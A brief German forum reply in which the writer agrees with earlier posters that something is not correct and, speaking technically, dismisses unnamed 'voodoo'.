Und in diesem Punkt stimme ich meinen vorpostern zu das ist alles nicht Korrekt.

Aber nochmal rein Technisch gesehen ... vergesst ihrgendwelchen Voodoo.